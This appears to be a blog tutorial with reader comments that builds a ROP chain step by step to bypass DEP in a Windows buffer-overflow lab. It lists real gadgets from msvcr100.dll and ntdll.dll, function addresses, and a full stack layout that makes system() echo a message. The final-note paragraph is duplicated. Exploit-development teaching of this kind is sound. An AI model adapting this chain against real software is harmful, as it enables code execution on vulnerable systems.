Motivation
You found stack buffer overflow vulnerability in a program, but the target environment protected with Hardware-enforced Data Execution Prevention (DEP) mechanism. Briefly speaking, this security feature allows marking certain parts of memory as non-executable, i.e. stack or heap memory pages.
Therefore you can't just overwrite the saved eip address with jmp esp instruction and execute the shellcode from the stack (attempting to run code from the stack will cause a STATUS_ACCESS_VIOLATION exception).
Return-Oriented Programming (ROP) technique
This technique uses existing instruction sequences from loaded modules. No function calls, no any other intentionally placed instructions execution! Because all the executed instructions are located at executable memory pages, this allows us to bypass Hardware-enforced DEP mechanisms.
Shacham et al. state that ROP, given any sufficiently large codebase to draw on, is a Turing-complete exploit language, which means that it can simulate any other language.
More information, including historical facts and detailed explanation, can be found in these slides.
The Goal
For the sake of simplicity, I will assume that there's a vulnerability which allows us to overwrite saved eip using regular stack buffer overflow (read: no stack canary protection applied). I will take control over program flow, echo the "You have been hacked" string using system function and exit the program. Note that ROP not limited to system function in order to execute attacker code - I will just use it to simplify the example.
The Preparations
I will use the Wikipedia stack buffer overflow example program as a vulnerable target, with a slight difference: instead of strcpy function, I will use fread - just to make it more convenient for testing:
Note: I'm using Windows 7 64-bit with Visual Studio 2010.
Before compiling the project, I've set the following options:
- /GS flag should be set to NO [from Project Properties > C/C++ > Code Generation > Buffer Security Check > set to No (/GS-))\]. By that I'm disabling the stack canary protection.
- /NXCOMPAT should be set to YES [from Project Properties > Linker > Advanced > Data Execution Prevention > set to Yes (/NXCOMPAT)]. This setting enabling the DEP protection.
- Optimization disabling [from Project Properties > C/C++ > set both Optimization and Inline Function Expansion to Disabled], so the compiler will generate exact instructions for our program.
Few notes on C run-time library:
- I'm using Visual Studio 2010, so the library version is 10.0, but it can vary depending on Visual C++ compiler version.
- If you compiled with Debug configuration, the referenced library will be MSVCR100D.dll (D stands for debug).
Gadgets Strategy
Shacham et al coined the term gadget to name sequence of existing instructions ending with ret instruction which compose one logical unit. ROP is about creating a chain of gadgets (logical units) to accomplish the exploitation goal. For example if I need to copy eax value to ecx, I will search for mov eax, ecx + ret sequence within existing modules, and the address of mov eax,ecx instruction will indicate the gadget's address.
Continue to read the below example, and you will understand the principle.
This example's gadgets strategy will be as follows:
- Save the esp's value into another register.
- Prepare the parameters for the system function.
- Call the system function.
- Call the exit function to exit the program.
Searching for ROP gadgets
I will use the simplest way to find gadgets. See Mona Project (ex pvefindaddr) for more sophisticated technique.
In OllyDbg, select the module you want to browse, right click within the module code view and select Search for > All sequences. The following dialog will show up:
The following commands available (found here):
- R8, R16, R32 for any 8, 16, 32 bit register respectively
- CONST for any constant
- JCC for any conditional jump
- ANY N for any 0..N commands
- ... and of course any assembly command
The Exploit
1. Saving the ESP value
The best gadget for this task could be mov r32, esp + ret, but unfortunately none of the referenced modules include this sequence. Then I searched for push esp + pop r32 + ret, but this sequence did not provide any results as well. I believe you already convinced that searching and creating gadget chains requires patience and erudition. Corelan even compares it to solving Rubik's Cube.
In the end I used the following search pattern:
and found this sequence in msvcr100.dll (let's call it LEA EBP,[ESP+0Ch] gadget):
lea ebp, dword ptr ss:[esp+0Ch]Great! It's a bit inconvenient, but better than nothing. I will have to add extra instructions to accommodate with the push eax instruction in the middle, right? Well, let's think about this a bit.
push eax
retn
The stack will look like that before the jump to lea instruction's address (assuming 0x1000 is the stack address of saved eip value):
0x1000 LEA EBP,[ESP+0Ch] gadget address
0x1004 junk
0x1008 junk
Let's follow the flow: we get to ret instruction that pops the LEA EBP,[ESP+0Ch] gadget's address from the stack and jumps to that location (esp increased to 0x1004 due to pop); then esp+0Ch address computed and stored in ebp; then push eax decreases the esp to 0x1000 and copies its value (some unknown garbage) to 0x1000. But note what happen next - retn instruction pops the value from the stack (eax's unknown garbage) and jumps to that location. Not good!
We have to initialize the eax with a valid address - the search pattern pop eax + ret retrieved many matches (I chose one from msvcr100.dll).
Let's summarize the desired stack view at this point:
0x1000 POP EAX gadget address (saved EIP value)
0x1004 RET address (any RET instruction address - will be popped to EAX and used to increment the ESP)
0x1008 LEA EBP,[ESP+0Ch] gadget address
On ebp's value calculation, the esp will point on 0x100c (verify that you understand why), so the value that will be stored in ebp is 0x1018. In the end of this execution, the esp will point on 0x100c.
2. Prepare the parameters for the system() function call
system() function expects for single parameter - address of string containing the system command to be executed. This address is passed on the stack in __cdecl calling convention, so in total need to calculate two addresses:
- The address of command string.
- The address on the stack where system expects to find the parameter.
In previous step, I stored esp+0Ch address in ebp register. ebp register is not commonly participating in arithmetic operations, so I will copy its value to eax register. mov eax,ebp + ret search pattern didn't retrieved any results, so I searched for lea instruction again: lea eax,[ebp+CONST] + ANY 1 + ret retrieved the following sequence (from ntdll.dll, let's call it LEA EAX,[EBP-10h] gadget):
lea eax, [ebp-10h]
mov dword ptr fs:[0], eax
retn
Note that the second instruction in this sequence overrides the FS:[0] pointer, which points to the SEH (Structured Exception Handling) chain. But I don't care about it at this point.
Recall that ebp's value was 0x1018, so eax will get 0x1008. Let's now calculate the address of the system function's parameter (which will eventually store the address of our command string).
The add eax, CONST + ret search pattern retrieved many results. I will choose the following from ntdll.dll (ADD EAX,20h gadget):
add eax, 20h
retn
Executing this gadget once will increase the eax to 0x1028, but will not be sufficient because it will override the shellcode (see below). So let's make more room and execute this gadget again. eax will point on 0x1048. This will be high enough.
Now I'll save it in another register (because we have to proceed with calculation on eax). Search pattern mov R32,eax + ANY 2 + ret retrieved the following sequence (MOV ECX,EAX gadget) from ntdll.dll:
mov ecx, eax
mov eax, edx
mov edx, ecx
retn
The eax's value will be copied to ecx and edx, but it will also be overridden with edx's previous value. So we will have to restore the eax value (MOV EAX,EDX gadget from msvcr100.dll):
mov eax, edx
retn
The last thing to do here is to calculate the address of our command string and store it in the address where ecx pointing to. ADD EAX,20h gadget will bring the eax to 0x1068 (this will be the address of our command string), and then we store it with MOV [ECX],EAX gadget (from msvcr100.dll):
mov [ecx], eax
retn
I will use the echo command as a command passed to system function with "You have been hacked" parameter.
The stack view at this point will be as follows:
0x100c LEA EAX,EBP-10h gadget address
0x1010 ADD EAX,20h gadget address
0x1014 ADD EAX,20h gadget address
0x1018 MOV ECX,EAX gadget address
0x101c MOV EAX,EDX gadget address
0x1020 ADD EAX,20h gadget address
0x1024 MOV [ECX],EAX gadget address
...
0x1048 0x1068 (system() parameter)
...
0x1068 6F686365h ; echo
0x106c 756F5920h ; You
0x1070 76616820h ; hav
0x1074 65622065h ; e be
0x1078 68206E65h ; en h
0x107c 656B6361h ; acke
0x1080 00000064h ; d
3. Calling the system() and exit() functions
Download and compile the arwin program, which is a tiny win32 address resolution tool. It receives module name and function name as parameters, and outputs the function address within the module. Both system and exit functions located in msvcr100.dll, so I ran it like this:
D:\>arwin msvcr100.dll system arwin - win32 address resolution program - by steve hanna - v.01 system is located at 0x78b02632 in msvcr100.dll D:\>arwin msvcr100.dll exit arwin - win32 address resolution program - by steve hanna - v.01 exit is located at 0x78ac7b0c in msvcr100.dll
Now we need to decide where to place those two addresses.
Recall that in __cdecl calling convention, in order to call a function with a parameter you have to push the parameter on the stack and use the call instruction. This instruction pushes the content of eip onto the stack, which in turn points to the next instruction after the call. When the function finishes, ret instruction will pop the saved eip from the stack and jump to that location. Let's mimic this behavior:
We've already stored the system parameter (the address of our echo command) at 0x1048. Below that (at 0x1044) should be the saved eip, which is the address of next instruction after the call to system function - in this case it's an address of exit function.
Let's summarize it all together:
0x1000 POP EAX gadget address (saved EIP value)
0x1004 RET address (any RET instruction address - will be popped to EAX and used to increment the ESP)
0x1008 LEA EBP,[ESP+0Ch] gadget address
0x100c LEA EAX,EBP-10h gadget address
0x1010 ADD EAX,20h gadget address
0x1014 ADD EAX,20h gadget address
0x1018 MOV ECX,EAX gadget address
0x101c MOV EAX,EDX gadget address
0x1020 ADD EAX,20h gadget address
0x1024 MOV [ECX],EAX gadget address
0x1028 RET address
0x102c RET address
0x1030 RET address
0x1034 RET address
0x1038 RET address
0x103c RET address
0x1040 78b02632 (system() function address)
0x1044 78ac7b0c (exit() function address)
0x1048 0x1068 (system() parameter)
...
0x1068 6F686365h ; echo
0x106c 756F5920h ; You
0x1070 76616820h ; hav
0x1074 65622065h ; e be
0x1078 68206E65h ; en h
0x107c 656B6361h ; acke
0x1080 00000064h ; d
Note that I filled addresses 0x1028 to 0x103c with ret instruction addresses just to increment the esp register by 4 bytes each time.
Final Note
That's it. Now I'll use Hex editor to craft a binary file with a shellcode content (including 20 padding bytes at the beginning). If everything went well, the expected result will be displayed:
For additional reading:
ROP exploit writing tutorial by Corelan
Final Note
That's it. Now I'll use Hex editor to craft a binary file with a shellcode content (including 20 padding bytes at the beginning). If everything went well, the expected result will be displayed:
For additional reading:
ROP exploit writing tutorial by Corelan
Great article...
ReplyDeleteI was reading about ROP based PDF exploits, failed to understand how it worked. So I start reading whatever I am finding. Please send me an email if possible at rzvzrz-at-gmail-dot-com.
did it work well? i've just follow what you've done and i can't find MOV [ECX],EAX gadget;
ReplyDeleteonly i can got best is :
MOV [ECX],EAX
LEAVE
RETN
and LEAVE instr. is ruining me...
Try to save the argument pointer address (0x1048 in my example) in another register.
DeleteI'm using MOV ECX,EAX (at 0x1018), but instead of ECX, if you'll find a gadget with another register; and then will find a gadget with same register to replace ECX in MOV [ECX],EAX (0x1024) - you will be ready to proceed.
and what should i write in hex for 0x1048 0x1068 (system() parameter) ??
ReplyDeleteand i very appreciate you for the great post
The value at 0x1048 is calculated at runtime. You should populate it with the starting address of your system command (the one that used as an argument to system function).
Deleteok i think i got it. thank you very much again. and i found MOV [ECX],EAX gadget on msvcr100d.dll
Delete(i'm using VS2012)